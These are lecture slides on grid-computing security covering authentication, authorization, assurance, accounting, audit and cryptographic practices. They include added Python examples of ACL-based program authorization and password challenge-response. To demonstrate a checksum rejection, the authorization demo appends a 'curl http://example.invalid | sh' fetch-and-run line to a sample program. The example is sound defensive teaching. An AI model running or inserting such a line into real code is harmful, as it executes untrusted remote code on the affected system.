Transcript Chapter16

Security in Grid Computing
GRID COMPUTING

Three basic approaches for managing code, data and computer resources:

1. Remote Computing (as provided by CORBA)
   - The code of interest is at a computer server.
   - The user sends his data for processing to the computer server and gets back the results.

Ref: Ch. 16: "Security, Accounting and Assurance" by Clifford Neuman

Three basic approaches (continued):

2. Code Shipping (as used in 'network computers')
   - The requesting location gets the code, which is normally located on a server.
   - The code operates on the local data in the client's environment.

The third approach:

3. Proxy Computing (as used in Legion and Globus)
   - Both the code and the hardware may be obtained from other parties.
   - Both the code and data are transferred to the compute-server and the results are made available to the user.

Requirements

Validation of:
   - source and code integrity,
   - the client,
   - the computer server, and
   - the code provider.

Grid Security

Traditional security system:
   - To protect the system, owned by one user, against attempts at unauthorized "entry" by all the other, unauthorized users (supposed to be of malicious intent).

Grid security systems:
   - To protect the application and data from the owner/administrator of the system, and
   - to protect local programs and data on a system on which another remote user's process may also be executing.
   - Data, code and resources are accepted after proper authentication.
   - Integrity of data and code is required to be verified.

Security Requirements

1. AUTHENTICATION
Verifying a principal's claimed identity.
Principal:
   - a user logged on a remote system, or
   - a local user logged on the server, or
   - the server itself
Two-step process:
   - User name
   - Password
(Check:
   - something you know (common)
   - something you have
   - something you are
   - what you do (key-stroke patterns)
   - where you are)

Security Requirements (cont'd)

GRID: Mutual authentication is required for the user and the service provider. (The resources and data being provided by a server could be provided by an attacker.)
Data origin authentication: to determine whether a program was modified or sent by an attacker to compromise the server.
Data origin authentication does not establish that the data was recently sent by the principal.
Delegation of identity: when an application or a process is authorized to assume the identity of a different principal.

Security Requirements: Authorization

2. AUTHORIZATION
Authentication is used for granting authorization.
Authorization is based on
   - the successful authentication of a principal, and
   - the information available with the server. This information is the Access Control List for a file/directory/service.
Examples:
   - Authorization for accessing a file in a digital library.
   - Authorization for reserving bandwidth on a network by using RSVP (Resource Reservation Protocol).
   - Authorization to run a task on a given node.
Access Control Lists may also contain
   - names of authorized programs
   - checksums of authorized programs
   - names of principals authorized to invoke the program.

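An added example, not part of the original slides: an authorization check for "run a task on a given node" driven by an ACL that holds the program name, its checksum and the principals allowed to invoke it. The ACL layout, the principal names and the sample program are constructed for illustration.

```python
import hashlib
import hmac


def sha256_hex(code: bytes) -> str:
    """Checksum stored in the ACL and recomputed over the received bytes."""
    return hashlib.sha256(code).hexdigest()


# Constructed sample program shipped to the compute server.
RENDER_JOB = b"#!/bin/sh\necho rendering frame\n"

# Constructed ACL for one node: program name -> checksum + allowed principals.
ACL = {
    "render_job": {
        "sha256": sha256_hex(RENDER_JOB),
        "principals": {"alice@site-a", "bob@site-b"},
    },
}


def authorize(acl, principal, authenticated, program_name, program_bytes):
    """Return (allowed, reason). Every path that is not explicitly
    permitted ends in a denial."""
    # Authorization is only meaningful after successful authentication.
    if not authenticated:
        return False, "principal not authenticated"
    entry = acl.get(program_name)
    if entry is None:
        return False, "program not in ACL"
    # The checksum binds the authorized name to the exact bytes received,
    # so a modified program cannot run under an authorized name.
    if not hmac.compare_digest(sha256_hex(program_bytes), entry["sha256"]):
        return False, "checksum mismatch"
    if principal not in entry["principals"]:
        return False, "principal not authorized for program"
    return True, "ok"


if __name__ == "__main__":
    tampered = RENDER_JOB + b"curl http://example.invalid | sh\n"
    for who, code in [("alice@site-a", RENDER_JOB),
                      ("alice@site-a", tampered),
                      ("mallory@site-c", RENDER_JOB)]:
        print(who, authorize(ACL, who, True, "render_job", code))
```
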
Security Requirements: Authorization (cont'd)

Delegation of authority: by a user or a process authorized to perform an operation, to another process.
Delegation of authority (DA) vs. delegation of identity (DI): DA is more restrictive than DI.
Important for running tasks on remote nodes, since the tasks may have to be given the authority to read/write data on entities across the network.
Example: A Resource Manager may allocate a node to a task. It delegates to the task's initiator the authority to use the node.

Security Requirements: Assurance

3. ASSURANCE/Accreditation
Authorization:
   So that the service provider may decide whether to perform the job of the requester of the service.
Assurance:
   So that the requester of the service may decide whether the service provider/node satisfies his needs for security, reliability etc.
Example: If the service provided is a software package, a Resource Manager has to verify the assurance credentials of the program before it is run.

Security Requirements: Accounting

4. ACCOUNTING
Grid requires distributed accounting servers, and the systems should be scalable beyond organizational boundaries.
Scenario of excess processing power: equitable distribution of load/earnings.
Scenario of excess processing loads: equitable decision about which jobs to run.
Cost? In cash/barter?

Security Requirements: Audit and Integrity & Confidentiality

5. AUDIT
The audit function records
   - the operations performed by each system on the grid;
   - the principal for whom the operation was performed, etc.
This is to analyze failures, security breaches and intrusions.
To detect network attacks, the audit function should be distributed, or audit records sent to a central location for each organization, and summary information shared across network boundaries.

6. Integrity and confidentiality of program and data sent from one node to another.

Security Requirements: Comments

Authentication, Authorization and Integrity are mandatory.
Others may be needed for some applications/environments.
Basically, authentication establishes who you are; authorization establishes what you can do.
In Grid applications, the user is also to be protected from interference by others. The needs of the user would depend upon his application.

Technologies: Cryptography

   - symmetric
   - asymmetric (public/private key system)
Comparison: Asymmetric systems require the generation of only one key pair for every user; a symmetric system requires the generation of a key for every pair of users.
Thus the number of keys required for a symmetric-key system is n(n-1)/2, whereas it is 2n for the asymmetric case. (For n >= 6, the number of keys for a symmetric system is more than that for an asymmetric system.)

Cryptographic Systems: Performance

Performance: Asymmetric systems are much slower than the corresponding symmetric systems.
Example (page 402, 1999 book): RSA, with a common key size of 512 to 1024 bits, may take 100 ms or longer on PCs.
Problem of Certifying Authority/Trusted Third Party.

Technologies (cont'd)

Application: Authentication Systems
   - Assertion-based: for systems where processors and their associated software are trusted to identify users to other processes, and where messages are protected from modification by adversaries.
   - Password-based: the password (PW) cannot be sent on a network. Use the PW as an encryption key.

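An added example, not part of the original slides: password-based authentication in which the password never crosses the network. Because the Python standard library has no block cipher, the password-derived key is used here to key an HMAC over a server nonce rather than to encrypt it; the `Server` class, `client_response` and the iteration count are assumptions of this sketch.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed PBKDF2 work factor for this example


def derive_key(password: str, salt: bytes) -> bytes:
    """Turn the password into a key; only this key is ever used on the wire."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def proof(key: bytes, user: str, nonce: bytes) -> bytes:
    """Keyed digest over the fresh nonce, bound to the claimed identity."""
    return hmac.new(key, nonce + user.encode(), hashlib.sha256).digest()


class Server:
    def __init__(self):
        self.users = {}    # user -> (salt, derived key); no plaintext password
        self.pending = {}  # user -> nonce of the one outstanding challenge

    def enroll(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[user] = (salt, derive_key(password, salt))

    def challenge(self, user: str):
        """Send the salt and a fresh random nonce to the client."""
        salt, _ = self.users[user]
        nonce = os.urandom(16)
        self.pending[user] = nonce
        return salt, nonce

    def verify(self, user: str, response: bytes) -> bool:
        # pop() makes each nonce single-use, so a captured response
        # cannot be replayed against the same challenge.
        nonce = self.pending.pop(user, None)
        if nonce is None or user not in self.users:
            return False
        _, key = self.users[user]
        return hmac.compare_digest(proof(key, user, nonce), response)


def client_response(user: str, password: str, salt: bytes, nonce: bytes) -> bytes:
    """Client side: derive the key locally and answer the challenge."""
    return proof(derive_key(password, salt), user, nonce)
```

The stored derived key is password-equivalent for this exchange, so the server's user table needs the same protection as a Kerberos KDC database.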
Encryption: Applications

Encryption is used for
   - confidentiality of data
   - integrity of data (message digest/checksum)
   - authentication
Certification for authentication provides the binding between
   - an encryption key and
   - the authenticated identity
X.509 is used by
   - browsers
   - commercial e-mail
   - electronic payment systems based on PK products.

Distributed Authorization & Assurance

Hierarchical organization of CAs.
Certification is also required for
   - authenticity of authorization (PRIVILEGE ATTRIBUTE CERT)
   - authenticity of assurance (CREDENTIALS CERT)
Restrictions and conditionalities may be added to an authorization for an operation.
ALTERNATIVE: Authorization information may be provided by an Authorization Server directly to the Service Provider.
Integrity of communication between the Authorization Server and the Service Provider?

Accounting

BILLING
   - requires authentication of the user.
   - requires knowing the constraints on authorization in order to levy charges correctly.
Limits:
   - Limits on resource use by a user
   - Limits on use of the resource, set by a service provider.
These may require co-ordination/some element of centralization even when accounting is distributed.

Intrusion Detection & Audit Systems

CURRENT PRACTICES: USE IN GRID SECURITY

Current Practices

- File & e-mail encryption technologies
   - Pretty Good Privacy
   - S/MIME
- Transport layer technologies / Web access technologies
   - Secure Socket Layer
- Network encryption technologies
   - IPsec, used for implementing VPNs, can use
      - Kerberos,
      - a public key system, or
      - symmetric keys known to the two hosts

Current Security Practices (continued)

- Authentication technologies
   - Kerberos
   - PK certificates
- Assurance technologies
   - Microsoft Authenticode
   - Proposals:
      - Mechanism for issuing credentials
      - Platform for Content Selection (PICS)
- Confinement technologies

Distributed Authorization Mechanism

- Authorization: group information or authorization to perform certain operations
   - OSF-DCE (Open Software Foundation's Distributed Computing Environment)
- Comprehensive frameworks for authorization have become available; they are required to be designed, implemented and tested before rolling out on the grid.

Distributed Authorization Mechanism (cont'd)

Authorization information can be sent to the Service Provider
   - directly, through restricted credentials, or
   - through adding authorization information to certificates.

Security at Transport Layer

At the transport layer, the addition of a security mechanism can provide
   - Authentication
   - Confidentiality
   - Integrity
Security can be adapted to the requirements of the communication.
Example: for communication within a multi-processor system, no encryption may be required.
Authorization can be decided only after interrogating the application.

Distributed Authorization Mechanism (continued)

Performance issues:
   - Authentication may be required only once.
   - Authorization and delegation of authorization may be required many times during the execution of a job.
   - PK-based systems, like the certificates, may become a bottleneck.

Current Security Practices (continued)

   - IPSec and VPNs
   - Firewalls: Open channel grid connected to others through a public network through encrypted message flow

Grid Practices

1. Grids use technologies similar to the ones used in PGP.

Procedure:
   - Compute a message digest function over the message.
   - Encrypt the message with a symmetric key.
   - Encrypt the message digest and the symmetric key by using the public-key system.
   - Confidentiality: use the recipient's public key.
   - Integrity (digital signature): use the sender's private key.

In PGP, any user can certify another user's certificate. The verifier decides whether he would accept the certificate or not.
Grid: a more formal process.

Grid Practices (continued)

2. SSL is normally used in web browsers to authenticate the server.
   - User: authenticated by password (over a secure channel).
   - In grid applications, the user certificate can be used to authenticate the user.
   - To improve performance, SSL may be permitted to cache symmetric keys.
   - The cached keys are to be used for subsequent connections between the same server and user.

Grid Practices (continued)

3. Kerberos: suitable for systems which require frequent authentication
   - Better performance than that of systems based on public-key cryptography
   - Can be integrated easily with intrusion detection and authorization systems (due to its centralized nature)
   - PKINIT extension to Kerberos

Grid Practices (continued)

   - Disadvantage: a trusted on-line Key Distribution Center (KDC)
   - Each pair of communicating entities has to go to the KDC

4. Others: NetCheque for distributed accounting